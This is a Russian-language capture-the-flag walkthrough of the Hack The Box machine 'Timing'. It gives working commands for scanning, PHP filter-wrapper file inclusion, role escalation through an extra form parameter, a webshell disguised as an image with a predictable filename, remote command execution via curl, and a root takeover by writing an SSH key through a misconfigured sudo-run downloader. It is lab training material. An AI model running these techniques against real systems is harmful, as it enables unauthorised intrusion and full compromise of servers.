123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1

Результат сканирования

Сканер нашел два открытых порта:

80 — веб‑сервер Apache 2.4.29;
22 — служба OpenSSH 7.6p1.

На SSH нам ловить нечего, пропускаем его.

Брутфорс учеток

У нас пока нет учетных данных, поэтому нет смысла в анализе служб, которые как правило требуют авторизации (например, SSH). Единственное, что можно сделать на данном этапе — перебрать пароли брутом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вариантов может не быть, но можно всегда использовать социальную инженерию.

При попытке обращения к веб‑серверу происходит редирект на страницу/login.php и форму авторизации.

Форма авторизации login.php

Исходя из этого можно предположить, что это не одностраничный сайт, поэтому будем пробовать отыскать скрытые страницы. Первая страница была в PHP, логично остальные перебирать тоже с расширением PHP. Я предпочитаю использовать для этой цели сканер ffuf.

Сканирование веба c ffuf

Первое действие при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов. Для этой цели вы можете использовать программы вроде DIRB и dirsearch.

Мне нравится легкий и очень быстрый ffuf. Параметры запуска:

-w — словарь (лично я предпочитаю словари из SecLists);
-fc — исключить из результата ответы с кодом 403;
-u — URL;
-t — количество потоков.

Запускаем ffuf с параметрами:

1ffuf -u http://timing.htb/FUZZ -t 256 -w php_files_common.txt

Результат сканирования PHP-файлов

Сканер нашел множество файлов, теперь попробуем найти скрытые каталоги.

1ffuf -u http://timing.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt

Сканирование скрытых каталогов

Сканер находит каталоги использующиеся для хранения скриптов и изображений. И это все. Сканирование поддоменов и файлов резервных копий нечего не дало.

Попробуем поискать параметры. Для сканирования разумеется выбираем страницу image.php, которая по идее должна возвращать изображения. Так как мы пока не знаем, что именно будет передано в качестве значения параметра, попытается передать само название страницы, надеясь получить какую-то ошибку.

1ffuf -u 'http://timing.htb/image.php?FUZZ=../image.php' -t 256 -w parameters.txt -fs 0

Сканирование параметра

Мы нашли один параметр —img. И теперь можно запросить файл с картинкой по его названию. Попытаемся таким образом снять какой‑нибудь системный файл, задав относительный путь.

Атака обнаружена

Попытка не удалась. Нас атаку обнаружили!

Видимо в данном конкретном случае используются какие‑то фильтры, которые не позволяют нам читать файлы. Я попробовал разные варианты оберток для параметра и понял, что срабатывает вот такой запрос:

12/image.php?img=php://filter/convert.base64-encode/resource=index.phpСправка: LFI в PHP

Local file inclusion (LFI) — техника, которую используют для получения доступа к файлам в системе через веб‑сервер. Чтобы веб-сервер отобразил файл, вместо попытки выполнения, ему следует передать «обертку» — это команды, которые закодируют файл. После его получения нужно лишь раскодировать его обратно. Есть множество различных готовых оберток, которые вы можете использовать в пентесте.

Содержимое полученной в ответ страницы, будет закодировано в Base64. Можно декодировать прямо в Burp, нажав сочетание клавиш Ctrl-Shift-B.

Код страницы index.php

Таким образом мы можем получить код всех страниц, просмотрим все страницы и среди них оисходный код страницы login.php.

Исходный код login.php

Наше внимание привлекает строка 10 — подключения файла db_conn.php. Там нашлась учетная запись для подключения к БД. Отроем и его.

Исходный код db_conn.php

Пароль ни к чему не подходит, поэтому продолжаем копать.

Переходим к известным файлам. Начинаем с upload.php.

Исходный код upload.php

В начале подключается файл admin_auth_check.php. После задаются нужные параметры для загруженного файла, в том числе иfile_name. Создание имени файла происходит по такому алгоритму: берется строка'$file_hash', после добавляется текущее время (результат выполнения функцииtime()) и все это конвертируется в хеш MD5, а затем добавляется знак нижнего подчеркивания и имя файла используемое при загрузке. Файл должен иметь расширение jpg. А в файле admin_auth_check.php только сравнивается роль пользователя.

Если бы$file_hash кто‑то по ошибке не обернул в кавычки, то было бы подставлено значение переменной, полученное от PHP-функцииuniqid(). Разгадать уникальный идентификатор у нас бы не получилось, а без него единственной преградой будет вывод функцииtime().

Исходный код admin_auth_check.php

Итак, здесь пока больше ничего не делать, и требуется брут формы авторизации. В начале найдем имена пользователей, к примеру в файле /etc/passwd.

Содержимое файла /etc/passwd

Но при подборе пароля сразу попробуем использовать имя пользователя в качестве пароля, и это дает нам доступ.

Панель авторизованного пользователя

Нам открывается новая функция — изменение профиля.

Форма изменения профиля

Форма изменения профиляФорма изменения профиля

При отправке данных формы просмотрим, куда они шлются, а потом получим код этой страницы, чтобы просмотреть, как обрабатываются данные.

История запросов в Burp

Исходный код update.php

Видим, что в обработчике на один параметр больше, чем отправляется через форму. Значит, мы можем добавитьrole и задать любую роль. Это должно дать нам привилегированный контекст.

Новый запрос

Ответ сервера

В итоге мы получаем ответ со всеми перечисленными параметрами, а на самой странице появляется ссылка на панель администратора.

Главная страница администратора

С панели администратора нам открывается функция загрузки аватара.

Форма загрузки файла

Мы знаем, что это должен быть файл с расширением jpg. Но вот только его содержимое не проверяется, поэтому мы можем записать туда код на PHP и затем попробовать выполнить. Запишем следующий простой PHP-шелл, выполняющий принятую команду, и загрузим файл на сервер.

1echo '' > test.jpg

Сообщение о загрузке файла

Файл успешно загружен, теперь определимся с именем, под которым он сохранился на сервере. Для этого вспомним принцип, по которому он формируется.

Код формирования имени загруженного файла

Единственная переменная, которую нам осталось получить, — значение функции time(). Эта функция возвращает количество секунд, прошедших с 00:00:00 01.01.1970. И если мы знаем время загрузки файла, установленное на сервере, мы сможем получить это значение. Так как вся работа выполняется через Burp, в истории запросов найдем HTTP-заголовок ответа сервера. В заголовке Date будет указано нужное нам время.

HTTP-заголовок ответа сервера при загрузке файла

Теперь мы можем получить значение MD5 от сложения всех строк:

1echo md5('$file_hash' . strtotime("Wed, 05 Jan 2022 13:19:51 GMT"));

Расчет первой части имени файла

Нам нужно обращаться к файлу вот с таким именем:

1e3879d6c6425db4ad6e139681d11693d_test.jpg

Попробуем с помощью нашего хеша выполнить базовую команду id.

1curl 'http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=id'

Выполнение команды id

Команда успешно выполнена, что означает получение доступа к хосту.

Продвижение

Для дальнейшего продвижения нам необходимо найти учетные данные. Для этого предстоит изучить файлы в каталоге веб‑сервера, всевозможные резервные копии и другие пользовательские файлы. Так находим бэкапы исходников в каталоге /opt.

Содержимое каталога /opt

Копируем архив в каталог веб‑сервера и легко скачиваем через браузер.

1curl 'http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=cp+/opt/source-files-backup.zip+./'

Скачивание исходных кодов через браузер

В архиве присутствует каталог с расширением git. Это позволит нам получить доступ к истории изменений файлов.

Содержимое архива

Для удобной работы с репозиториями Git можно использовать графический просмотрщик gitk. Он помог найти изменение пароля для подключения к базе данных.

Изменение в файле db_conn.php

А вот уже с этим паролем удается подключиться по SSH и забрать первый флаг.

Флаг пользователя

Локальное повышение привилегий

Первым делом проверяем наиболее вероятные места повышения привилегий: настройки sudoers, приложения с выставленным битом SUID, прослушиваемые на локалхосте порты. Проверим sudoers командой sudo -l.

Настройки судоера

В настройках прописан привилегированный запуск /usr/bin/netutils без ввода пароля (NOPASSWD). Просмотрим тип файла.

Определение типа файла /usr/bin/netutils

Это обычный скрипт. Давай глянем на его содержимое.

Содержимое файла /usr/bin/netutils

Это пользовательское приложение на Java. Но так как оно расположено в каталоге рута, мы не можем получить доступ к самому файлу и декомпилировать его, чтобы изучить. Тогда давай хотя бы запустим программу и посмотрим, как она работает.

Меню приложения

Нам предлагают выбрать одну из опций: FTP или HTTP. После чего с указанного ресурса загружается файл.

Сообщение о загрузке файла

Посмотрим, что происходит с процессами в системе при выполнении этого приложения. Для отслеживания процессов будем использовать pspy64. Загрузим его на хост:

1scp ./pspy64 aaron@timing.htb:/tmp/

И выполним. В выводе видим запуск скрипта, но, что более интересно, после указания адреса для загрузки используется программа axel в контексте пользователя с UID=0, а это пользователь root.

Логи pspy

Я сразу попробовал выполнить инъекцию команды ОС, но это ничего не дало.

Тестирование OS Command Injection

Однако мы можем конфигурировать axel и управлять некоторыми его параметрами, к примеру именем файла и каталогом для его сохранения. Недолго размышляя, пробуем сохранить файл как публичный SSH-ключ пользователя root. Для этого в домашнем каталоге текущего пользователя сохраним файл .axelrc со следующим содержимым:

1default_filename = /root/.ssh/authorized_keys

Файл конфигураций axel

На локальном хосте сгенерируем пару ключей (ssh-keygen) и переименуем публичный, чтобы он назывался index.html. Запустим простой веб‑сервер на Python:

1python3 -m http.server 80

А затем обратимся к нему из тестируемого приложения.

Запись SSH-ключа

Видим сообщение с именем сохраненного файла, пробуем подключиться с закрытым ключом и получаем контроль над хостом.

Взлом веб-сервера на PHP. Флаг рута

Машина захвачена, и у нас есть флаг рута.

Заключение

Сегодня мы с вами прошли путь от обычного сканирования сайта до эксплуатации уязвимости типа LFI и загрузки шелла. Надеюсь вам понравился наше увлекательное приключение Timing с площадки Hack The Box.

Полезные ссылки:

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code